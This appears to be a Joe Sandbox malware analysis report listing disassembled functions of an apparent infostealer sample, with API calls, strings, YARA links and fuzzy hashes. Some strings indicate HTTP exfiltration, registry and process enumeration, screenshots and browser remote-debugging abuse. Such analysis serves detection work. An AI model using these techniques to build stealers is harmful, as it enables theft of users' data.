                                                                                                                                                                                                                                                            Function 004077B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,HTTP/1.1,00000000,00000000,?,00000000), ref: 00407822
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                                                                                                                                            • String ID: GET$HTTP/1.1
                                                                                                                                                                                                                                                            • API String ID: 1984915467-4061949999
                                                                                                                                                                                                                                                            • Opcode ID: 217fecd13b2460af1abae7b9b74faf3b90c66457f266eb17740facb1646511b5
                                                                                                                                                                                                                                                            • Instruction ID: 88c5459bb71fff4a7f8c34efe04472a59221c94ba1fcd3e659fa59ec531c01e0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 217fecd13b2460af1abae7b9b74faf3b90c66457f266eb17740facb1646511b5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A201D4B87102059FDB08CF54DDC2E6B37AAFB9A305B04412DE402D3311E6B4BD14D799
                                                                                                                                                                                                                                                            Function 00404AF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00000000,?,00000000), ref: 00404B5B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                                                                                                                                            • String ID: HTTP/1.1$POST
                                                                                                                                                                                                                                                            • API String ID: 1984915467-2607092320
                                                                                                                                                                                                                                                            • Opcode ID: 3afca705eae934e9ab4fd044948e76d245cc508086a32c858528bfd13e9ad72f
                                                                                                                                                                                                                                                            • Instruction ID: 3038998626f07e8b1eadc8356ac5b2ca77d848b76d5db5110235d6b28d06937a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3afca705eae934e9ab4fd044948e76d245cc508086a32c858528bfd13e9ad72f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D01D8756201155FC70CDB58DD81D6B73A9EF963087084139E901F7312E7B5AD588768
                                                                                                                                                                                                                                                            Function 0041FEC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041FF42
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                            • String ID: %s\%s$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                            • API String ID: 71445658-1969869098
                                                                                                                                                                                                                                                            • Opcode ID: c6c32dde087a60be459981c5a25d9cdae22c500a76205aa6044837812575c95c
                                                                                                                                                                                                                                                            • Instruction ID: d72de999b2892b00457b4301201e501fe1f29f5046f65ed3e118f347551177f9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6c32dde087a60be459981c5a25d9cdae22c500a76205aa6044837812575c95c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C01D8B96002015FD324DF58DC91E6777E9FB85304F04002DE946D3262EA74A9088B65
                                                                                                                                                                                                                                                            Function 004077BF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,GET,?,HTTP/1.1,00000000,00000000,?,00000000), ref: 00407822
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                                                                                                                                            • String ID: GET$HTTP/1.1
                                                                                                                                                                                                                                                            • API String ID: 1984915467-4061949999
                                                                                                                                                                                                                                                            • Opcode ID: c26e72baf244679ae1380ab36c354a9d5c12ff323c7b3e85c0b6eb28420587d3
                                                                                                                                                                                                                                                            • Instruction ID: 5a2855c5d477d9864c51e49c90507d96aaf2b89e3308fb2ad7f604e3a9f164b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c26e72baf244679ae1380ab36c354a9d5c12ff323c7b3e85c0b6eb28420587d3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D60184B87102059FDB08CF54DD82E6B77AAFB9A305B044129E501D7311E7B5BD14C799
                                                                                                                                                                                                                                                            Function 0041FDC1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041FE30
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                            • String ID: ?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                            • API String ID: 71445658-2633480413
                                                                                                                                                                                                                                                            • Opcode ID: d320a3521d35f168751300790cb266167562fdbf6311ac38afecd85639501f0b
                                                                                                                                                                                                                                                            • Instruction ID: c8f2481e82a16eca426fec0ccf16404ca92c35e872ef3ce0eab83674d6df9e99
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d320a3521d35f168751300790cb266167562fdbf6311ac38afecd85639501f0b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7001D6B5A00204AFD3249F19EC94E2BBBE8FFC5345F05851EE84687391DA749804CB55
                                                                                                                                                                                                                                                            Function 00420420 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0042043C
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119), ref: 0042047D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Openmemset
                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                            • API String ID: 180050240-1514646153
                                                                                                                                                                                                                                                            • Opcode ID: 2ad32eb8251b01e98074a0d0486dcfb936fe310c63f78620c8fe9f07967d2f10
                                                                                                                                                                                                                                                            • Instruction ID: 704948cce47b6def0a0afe579a61564877315a8cc2ef23d99e61b0d3b5485971
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ad32eb8251b01e98074a0d0486dcfb936fe310c63f78620c8fe9f07967d2f10
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F0F6766412116BD214DB6ADC4AD2B7A6CFBC7314F05813CF818C7302D674A914C766
                                                                                                                                                                                                                                                            Function 004235EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28processCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00423615
                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000), ref: 00423622
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                            • String ID: 5$#w
                                                                                                                                                                                                                                                            • API String ID: 2353314856-2839390797
                                                                                                                                                                                                                                                            • Opcode ID: bae8fede1a8106b78921d416f13b3c645951278458bb2964471e672d63109a45
                                                                                                                                                                                                                                                            • Instruction ID: 5be2964b6b9545829f7e644963e2359ac3e23bc5df8f00164b782a01543cc960
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bae8fede1a8106b78921d416f13b3c645951278458bb2964471e672d63109a45
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F06DB5342215AFE7A0DB1DED85F6673E8EBCA304F550438AA04C7382DA74DD208765
                                                                                                                                                                                                                                                            Function 00421C6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16libraryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(Gdiplus.dll), ref: 00421C7F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                                                                                                            • String ID: 3}*X$Gdiplus.dll
                                                                                                                                                                                                                                                            • API String ID: 1029625771-3385796832
                                                                                                                                                                                                                                                            • Opcode ID: 83f535675c73549619932c820c058beef8f2ba26ac9fe6155ac65687aab25696
                                                                                                                                                                                                                                                            • Instruction ID: 3fe45f8394e78795334f831f8f6b676fc398847a8e65ceccf9ffb3b8370cb1d8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83f535675c73549619932c820c058beef8f2ba26ac9fe6155ac65687aab25696
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0E08C3930060ADFC704DF65C894E1873A2FB9D30431580B9C8428B322E77AA80ACB88
                                                                                                                                                                                                                                                            Function 004236F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004236FE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ProcessTerminate
                                                                                                                                                                                                                                                            • String ID: 5$#w$5$#w
                                                                                                                                                                                                                                                            • API String ID: 560597551-2883133298
                                                                                                                                                                                                                                                            • Opcode ID: 882f83642efd418665423add51b5c1a36d27814765caa829c4ac35b1579d154f
                                                                                                                                                                                                                                                            • Instruction ID: 7c70d1fc7905766f050714cb572277ef9d259369ec2c40e01a949b1e957500cb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 882f83642efd418665423add51b5c1a36d27814765caa829c4ac35b1579d154f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BC04CE76450007BE1629BD9ED82B3B23A4679EA80FA80415B321C26D0D618D6115A1A
                                                                                                                                                                                                                                                            Function 0040E4B8 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                            • String ID: --remote-debugging-port=9223 --profile-directory="$$|X
                                                                                                                                                                                                                                                            • API String ID: 2221118986-1363042206
                                                                                                                                                                                                                                                            • Opcode ID: ae06c8393336b333af05db5f16c75f1a9f5aa79fb8abcf2d5918810fac2cd834
                                                                                                                                                                                                                                                            • Instruction ID: 3ba3319f07a7289698a11f05052de0d729129f79ef8d96ea643ee3d8260e6b4f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae06c8393336b333af05db5f16c75f1a9f5aa79fb8abcf2d5918810fac2cd834
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14219FBAA421009FC754DB68DC91BED77E5BF8A304F084829E815D7311D774AA24CF4A
                                                                                                                                                                                                                                                            Function 0042C6C8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 170COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0042C7A4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                                            • String ID: C:\ProgramData\
                                                                                                                                                                                                                                                            • API String ID: 4241100979-1890264202
                                                                                                                                                                                                                                                            • Opcode ID: fd0e82dec119dba322a7c6096ded51b902f46ea9c2b987c5c6cec87d8c7672a0
                                                                                                                                                                                                                                                            • Instruction ID: 31c80a94cef3e32279e2b3b95fdfaa81a2b1e18fb5af080639bf195b1bb07545
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd0e82dec119dba322a7c6096ded51b902f46ea9c2b987c5c6cec87d8c7672a0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA515FB5F001108FDB14DF6DDC81AAA77F6EFC9304B088479A81AD7351DA34EA59CB98
                                                                                                                                                                                                                                                            Function 0040ED79 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040EE9B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                            • String ID: C:\ProgramData\
                                                                                                                                                                                                                                                            • API String ID: 1304948518-1890264202
                                                                                                                                                                                                                                                            • Opcode ID: 2882e95cde3e227961071db3bf314aefc9e93a392954357e6cde62046eb5ef51
                                                                                                                                                                                                                                                            • Instruction ID: fa38410b2714a6e77a67ab8d0ac84656252ce63968c3431b5881fbac74b51b6b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2882e95cde3e227961071db3bf314aefc9e93a392954357e6cde62046eb5ef51
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64417B76B400049FCB04DF9CDD81BAD77B5BF89214B084038E41AE3352DA34AE29CB9A
                                                                                                                                                                                                                                                            Function 004224D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseWindow
                                                                                                                                                                                                                                                            • String ID: screenshot.jpg
                                                                                                                                                                                                                                                            • API String ID: 2868366576-673422685
                                                                                                                                                                                                                                                            • Opcode ID: e872d15220e8eba057b17becdf5ddfe6898de3b7858142cab79ce1faf9401ced
                                                                                                                                                                                                                                                            • Instruction ID: 1474f4eb416e69a59470140b2970e150b16aab5e9dd82b7fb77fdc4fb0d98ae7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e872d15220e8eba057b17becdf5ddfe6898de3b7858142cab79ce1faf9401ced
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22414C7AA002049FCB05EFA9DC819DDB7F6FF893147084426E819E7320DB30AE16CB95
                                                                                                                                                                                                                                                            Function 0040E26E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040E382
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                            • String ID: $|X
                                                                                                                                                                                                                                                            • API String ID: 4033686569-3892261830
                                                                                                                                                                                                                                                            • Opcode ID: a307596c9b0dbdd293c27af80e64e3424aa25886e0e5d8551a5afdc3c504056d
                                                                                                                                                                                                                                                            • Instruction ID: de087bb8a02b9b5954df5ad64bbb9d21ead85b46a7a89c4a5d4623f81effc206
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a307596c9b0dbdd293c27af80e64e3424aa25886e0e5d8551a5afdc3c504056d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 404163BAA411049FCB05CFA8DC81AEDB7F1FF89304B048429E815D3315DB78AA15CF59
                                                                                                                                                                                                                                                            Function 0040D684 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 0040D775
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID: $|X
                                                                                                                                                                                                                                                            • API String ID: 2029273394-3892261830
                                                                                                                                                                                                                                                            • Opcode ID: 56462b0fbece8748853bf203f85b41ac87afc2f3bc7ba4b1a6761b8c2bef3194
                                                                                                                                                                                                                                                            • Instruction ID: 7bb2ff5dcfc8d279bcf81fe524ae3fa2dc5d0f95ca336393724a20a6615c9046
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56462b0fbece8748853bf203f85b41ac87afc2f3bc7ba4b1a6761b8c2bef3194
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61317EBA9416089BDB10CFA8DC81AEDB7B5FF84304F05C919DC59A7215EB30BA58CF91
                                                                                                                                                                                                                                                            Function 0041FFEF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?), ref: 004200C5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                            • String ID: DisplayVersion
                                                                                                                                                                                                                                                            • API String ID: 3660427363-1932467951
                                                                                                                                                                                                                                                            • Opcode ID: bc48f7ea78afc2e14c4617c34661b2e74e55b1eb1f49095dbd1ba4971cae8f9f
                                                                                                                                                                                                                                                            • Instruction ID: cf9f5ad6a68376e2735318beace1d251c566c4efb26f65f4e476611a35502c4e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc48f7ea78afc2e14c4617c34661b2e74e55b1eb1f49095dbd1ba4971cae8f9f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 562144753042059FD358DB5DDC91F2AB3EABFC5204F08851EA956C3362DBB4A908CB19
                                                                                                                                                                                                                                                            Function 0040764D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InternetOpen
                                                                                                                                                                                                                                                            • String ID: https
                                                                                                                                                                                                                                                            • API String ID: 2038078732-1056335270
                                                                                                                                                                                                                                                            • Opcode ID: d02382278dad8006a76467c89bb757bc7f4ff210bad68994d93f9964a0b8bbf9
                                                                                                                                                                                                                                                            • Instruction ID: df26f4550a862e9fd684f022062cfcdb87b4dfc3a6da9a7f5230f916b3431924
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d02382278dad8006a76467c89bb757bc7f4ff210bad68994d93f9964a0b8bbf9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC218179A002459BC700DF6CED81E9A77F9FF89204B088128EC15D7316E674EE54DB99
                                                                                                                                                                                                                                                            Function 0042BF5B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 0042C012
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID: %s\%s
                                                                                                                                                                                                                                                            • API String ID: 2029273394-4073750446
                                                                                                                                                                                                                                                            • Opcode ID: 49aec43eedd4154920b4152912b191205ad4e833ef8602dd1c6ae67f7dfd0253
                                                                                                                                                                                                                                                            • Instruction ID: 7bfc89935805b3c9f140502e9bada0774c28768e2a75f6990908da1cd339226d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49aec43eedd4154920b4152912b191205ad4e833ef8602dd1c6ae67f7dfd0253
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F21FDB25183469BD314DF64DC90FABB3A4FFD5304F048A2CE85883221EB78B659CB95
                                                                                                                                                                                                                                                            Function 0041F27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119), ref: 0041F2E3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                            • API String ID: 71445658-2278330950
                                                                                                                                                                                                                                                            • Opcode ID: 418cd68d096bd5568328dc315d2750d41cd1f5bd62fd0d55f38de4d56d20cbe7
                                                                                                                                                                                                                                                            • Instruction ID: 2e25e882f5a7e2b19922bce7a740613f80a7e1c0cd2294e75e808192a13d07e7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 418cd68d096bd5568328dc315d2750d41cd1f5bd62fd0d55f38de4d56d20cbe7
